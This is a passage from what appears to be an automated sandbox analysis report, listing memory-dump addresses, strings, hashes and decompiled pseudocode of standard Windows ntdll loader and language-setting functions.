                                                        0x00000000
                                                        0x047e88d5
                                                        0x00000000
                                                        0x047e88b2
                                                        0x047e88c9
                                                        0x00000000
                                                        0x047e88c9
                                                        0x047e887f
                                                        0x047e886a
                                                        0x047e8857
                                                        0x047e8852
                                                        0x047e88bf
                                                        0x047e88bf
                                                        0x047e87aa
                                                        0x047e87ad
                                                        0x047e87ae
                                                        0x047e87b4
                                                        0x047e87b5
                                                        0x047e87b6
                                                        0x047e87b8
                                                        0x047e87bd
                                                        0x047e87c1
                                                        0x047e87f4
                                                        0x047e87fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047e87c1
                                                        0x00000000

                                                        Strings
                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04839C18
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 04839C28
                                                        • LdrpDoPostSnapWork, xrefs: 04839C1E
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 0-1948996284
                                                        • Opcode ID: 00ac20fbdbec21f0350f0c28eb4d609bae091c2e08f1833abecd2dcad1cdb873
                                                        • Instruction ID: 6f643578197081fdc7557b65eae0a2444837f1d3fb22325ee0c940bc62b2ffbf
                                                        • Opcode Fuzzy Hash: 00ac20fbdbec21f0350f0c28eb4d609bae091c2e08f1833abecd2dcad1cdb873
                                                        • Instruction Fuzzy Hash: 8991F571A102159FDF18EF5AC880ABA73B5FF48354B064669DD05AB350E770FD42CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047E7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E047E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E047ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E047DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x48c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04855510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x48c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E047F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E047F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04857016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E047F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E047F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04857016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0480A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E047DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                        0x047e7e4c
                                                        0x047e7e50
                                                        0x047e7e55
                                                        0x047e7e58
                                                        0x047e7e5d
                                                        0x047e7e71
                                                        0x047e7f33
                                                        0x047e7e77
                                                        0x047e7e77
                                                        0x047e7e79
                                                        0x047e7e79
                                                        0x047e7e7e
                                                        0x047e7f45
                                                        0x04839848
                                                        0x00000000
                                                        0x04839848
                                                        0x047e7f4e
                                                        0x047e7f53
                                                        0x047e7f5a
                                                        0x00000000
                                                        0x00000000
                                                        0x0483985a
                                                        0x04839862
                                                        0x04839866
                                                        0x00000000
                                                        0x0483986c
                                                        0x00000000
                                                        0x0483986c
                                                        0x047e7e84
                                                        0x047e7e84
                                                        0x047e7e8d
                                                        0x04839871
                                                        0x047e7eb8
                                                        0x047e7ec0
                                                        0x047e7ec0
                                                        0x047e7e9a
                                                        0x0483987e
                                                        0x00000000
                                                        0x00000000
                                                        0x04839884
                                                        0x0483988b
                                                        0x048398a7
                                                        0x048398ac
                                                        0x048398b1
                                                        0x048398b6
                                                        0x048398b8
                                                        0x048398b8
                                                        0x048398b9
                                                        0x00000000
                                                        0x048398b9
                                                        0x047e7ea0
                                                        0x047e7ea7
                                                        0x00000000
                                                        0x00000000
                                                        0x047e7eac
                                                        0x047e7eb1
                                                        0x047e7ec6
                                                        0x047e7ed0
                                                        0x048398cc
                                                        0x047e7ed6
                                                        0x047e7ed6
                                                        0x047e7ed6
                                                        0x047e7ede
                                                        0x047e7ee3
                                                        0x048398e3
                                                        0x048398f0
                                                        0x04839902
                                                        0x048398f2
                                                        0x048398fb
                                                        0x048398fb
                                                        0x04839907
                                                        0x0483991d
                                                        0x0483991d
                                                        0x04839907
                                                        0x048398e3
                                                        0x047e7ef0
                                                        0x047e7f14
                                                        0x047e7f14
                                                        0x047e7f1e
                                                        0x04839946
                                                        0x047e7f24
                                                        0x047e7f24
                                                        0x047e7f24
                                                        0x047e7f2c
                                                        0x0483996a
                                                        0x04839975
                                                        0x04839975
                                                        0x0483997e
                                                        0x04839993
                                                        0x04839993
                                                        0x0483997e
                                                        0x00000000
                                                        0x047e7ef2
                                                        0x047e7efc
                                                        0x047e7f0a
                                                        0x047e7f0e
                                                        0x04839933
                                                        0x00000000
                                                        0x04839933
                                                        0x00000000
                                                        0x047e7f0e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047e7eb1

                                                        Strings
                                                        • LdrpCompleteMapModule, xrefs: 04839898
                                                        • minkernel\ntdll\ldrmap.c, xrefs: 048398A2
                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 04839891
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                        • API String ID: 0-1676968949
                                                        • Opcode ID: 7080f4dce334bbd92059962ccb7e24b3a6802cdf7b9d6a16db5288bd78dc626b
                                                        • Instruction ID: 5e516cf47ff983bbe8c17917ab059bd0322b73a24d9f649d0b7d8d7bb59e3800
                                                        • Opcode Fuzzy Hash: 7080f4dce334bbd92059962ccb7e24b3a6802cdf7b9d6a16db5288bd78dc626b
                                                        • Instruction Fuzzy Hash: 9851EE716007449BEB29CF6AC984B7AB7E4AB48318F040B99E951DB7E1D7B0FD00CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E047DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E047DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E048195D0();
						}
						if(_t78 != 0) {
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0481FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0481BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04819600();
					if(_t97 < 0) {
						goto L6;
					}
					E0481BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L047DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0481BB40(_t83, _t102 + 0x24, _t78);
								if(L047E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0481BB40(_t84, _t102 + 0x24, _t94);
									if(L047E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                        0x047de620
                                                        0x047de628
                                                        0x047de62f
                                                        0x047de631
                                                        0x047de635
                                                        0x047de637
                                                        0x047de63e
                                                        0x04835503
                                                        0x04835503
                                                        0x047de64c
                                                        0x047de64c
                                                        0x047de651
                                                        0x00000000
                                                        0x00000000
                                                        0x047de661
                                                        0x047de665
                                                        0x0483542a
                                                        0x047de715
                                                        0x047de71a
                                                        0x047de71c
                                                        0x047de720
                                                        0x047de720
                                                        0x047de727
                                                        0x047de736
                                                        0x047de736
                                                        0x047de743
                                                        0x047de743
                                                        0x047de673
                                                        0x047de678
                                                        0x047de67d
                                                        0x047de682
                                                        0x047de685
                                                        0x047de692
                                                        0x047de69b
                                                        0x047de6a3
                                                        0x047de6ad
                                                        0x047de6b1
                                                        0x047de6b2
                                                        0x047de6bb
                                                        0x047de6bf
                                                        0x047de6c0
                                                        0x047de6c8
                                                        0x047de6cc
                                                        0x047de6d5
                                                        0x047de6d9
                                                        0x00000000
                                                        0x00000000
                                                        0x047de6e5
                                                        0x047de6ea
                                                        0x047de6f9
                                                        0x047de70b
                                                        0x047de70f
                                                        0x04835439
                                                        0x0483545e
                                                        0x0483545e
                                                        0x00000000
                                                        0x0483545e
                                                        0x0483543b
                                                        0x0483543e
                                                        0x04835440
                                                        0x04835445
                                                        0x04835472
                                                        0x04835475
                                                        0x0483548d
                                                        0x04835493
                                                        0x048354a9
                                                        0x00000000
                                                        0x00000000
                                                        0x048354ab
                                                        0x048354b4
                                                        0x048354bc
                                                        0x048354c8
                                                        0x048354de
                                                        0x048354fb
                                                        0x048354e0
                                                        0x048354e6
                                                        0x048354eb
                                                        0x048354eb
                                                        0x048354de
                                                        0x00000000
                                                        0x048354bc
                                                        0x04835477
                                                        0x0483547a
                                                        0x04835480
                                                        0x04835483
                                                        0x04835486
                                                        0x0483548b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0483548b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04835447
                                                        0x04835447
                                                        0x04835447
                                                        0x04835447
                                                        0x0483544e
                                                        0x00000000
                                                        0x00000000
                                                        0x04835450
                                                        0x04835452
                                                        0x04835455
                                                        0x0483545a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0483545c
                                                        0x0483546a
                                                        0x0483546d
                                                        0x0483546f
                                                        0x00000000
                                                        0x0483546f
                                                        0x047de70f

                                                        Strings
                                                        • @, xrefs: 047DE6C0
                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 047DE68C
                                                        • InstallLanguageFallback, xrefs: 047DE6DB
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                        • API String ID: 0-1757540487
                                                        • Opcode ID: 1027dd1375277052a24a49ab9a6919a4377ddfd51b9869167e453740f5a2282e
                                                        • Instruction ID: d631088213f88363d60753a9b7ec1780926ccc4d80869a830a92cd689ab0bce8
                                                        • Opcode Fuzzy Hash: 1027dd1375277052a24a49ab9a6919a4377ddfd51b9869167e453740f5a2282e
                                                        • Instruction Fuzzy Hash: AA519EB2514315ABD714DF24C440A6AB3E8AF88729F050E2EF989D7350F734EA0487A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480FAB0, Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E0480FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E047EEEF0(0x48c7b60);
					_t134 =  *0x48c7b84; // 0x773b7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x48c7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x48c7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E047E6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E047E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04878938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E047DB150();
													}
													_t116 = E04876D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E047E75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x48c8638; // 0x66ee70
																	_t122 = L047E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E047E76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E047E76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0480FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L047E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0480FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0480FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0480FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0480FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0480FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x48c7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x48c7b84 = _t75;
						_t73 = E047EEB70(_t134, 0x48c7b60);
						if( *0x48c7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E047EFF60( *0x48c7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                        0x0480fab0
                                                        0x0480fab2
                                                        0x0480fab3
                                                        0x0480fab4
                                                        0x0480fabc
                                                        0x0480fac0
                                                        0x0480fb14
                                                        0x0480fb17
                                                        0x0480fac2
                                                        0x0480fac8
                                                        0x0480facd
                                                        0x0480fad3
                                                        0x0480fad3
                                                        0x0480fadd
                                                        0x0480fb18
                                                        0x0480fb1b
                                                        0x0480fb1d
                                                        0x0480fb1e
                                                        0x0480fb1f
                                                        0x0480fb20
                                                        0x0480fb21
                                                        0x0480fb22
                                                        0x0480fb23
                                                        0x0480fb24
                                                        0x0480fb25
                                                        0x0480fb26
                                                        0x0480fb27
                                                        0x0480fb28
                                                        0x0480fb29
                                                        0x0480fb2a
                                                        0x0480fb2b
                                                        0x0480fb2c
                                                        0x0480fb2d
                                                        0x0480fb2e
                                                        0x0480fb2f
                                                        0x0480fb3a
                                                        0x0480fb3b
                                                        0x0480fb3e
                                                        0x0480fb41
                                                        0x0480fb44
                                                        0x0480fb47
                                                        0x0480fb4a
                                                        0x0480fb4d
                                                        0x0480fb53
                                                        0x0484bdcb
                                                        0x0484bdcb
                                                        0x0480fb59
                                                        0x0480fb5b
                                                        0x0480fb5b
                                                        0x0480fb5e
                                                        0x0484bdd5
                                                        0x0484bdd8
                                                        0x00000000
                                                        0x0484bdda
                                                        0x00000000
                                                        0x0484bdda
                                                        0x0480fb64
                                                        0x0480fb64
                                                        0x0480fb64
                                                        0x0480fb67
                                                        0x0480fb6e
                                                        0x0480fb70
                                                        0x0480fb72
                                                        0x00000000
                                                        0x0480fb78
                                                        0x0480fb7a
                                                        0x0480fb7a
                                                        0x0480fb7d
                                                        0x0480fb80
                                                        0x0484bddf
                                                        0x0484bde1
                                                        0x00000000
                                                        0x0484bde3
                                                        0x00000000
                                                        0x0484bde3
                                                        0x0480fb86
                                                        0x0480fb86
                                                        0x0480fb86
                                                        0x0480fb8b
                                                        0x0480fb90
                                                        0x0480fb92
                                                        0x0480fb94
                                                        0x0480fb9a
                                                        0x0480fb9b
                                                        0x0480fba1
                                                        0x0484bde8
                                                        0x0484bdeb
                                                        0x0484bded
                                                        0x0484beb5
                                                        0x0484beb5
                                                        0x0484bebb
                                                        0x0484bebd
                                                        0x0484bec3
                                                        0x0484bed2
                                                        0x0484bedd
                                                        0x0484bedd
                                                        0x0484beed
                                                        0x00000000
                                                        0x0484bdf3
                                                        0x0484bdfe
                                                        0x0484be06
                                                        0x0484be0b
                                                        0x0484be0d
                                                        0x0484be0f
                                                        0x0484be14
                                                        0x0484be19
                                                        0x0484be20
                                                        0x0484be25
                                                        0x0484be27
                                                        0x0484be35
                                                        0x0484be39
                                                        0x0484be46
                                                        0x0484be4f
                                                        0x0484be54
                                                        0x0484be56
                                                        0x0484bef8
                                                        0x0484bef8
                                                        0x00000000
                                                        0x0484be5c
                                                        0x0484be5c
                                                        0x0484be60
                                                        0x00000000
                                                        0x0484be66
                                                        0x0484be66
                                                        0x0484be7f
                                                        0x0484be84
                                                        0x0484be87
                                                        0x0484be89
                                                        0x0484be8b
                                                        0x0484be99
                                                        0x0484be9d
                                                        0x0484bea0
                                                        0x0484beac
                                                        0x0484beaf
                                                        0x0484beb1
                                                        0x0484beb3
                                                        0x0484beb3
                                                        0x00000000
                                                        0x0484bea2
                                                        0x0484bea2
                                                        0x00000000
                                                        0x0484bea2
                                                        0x0484be8d
                                                        0x0484be8d
                                                        0x0484be92
                                                        0x00000000
                                                        0x0484be92
                                                        0x0484be8b
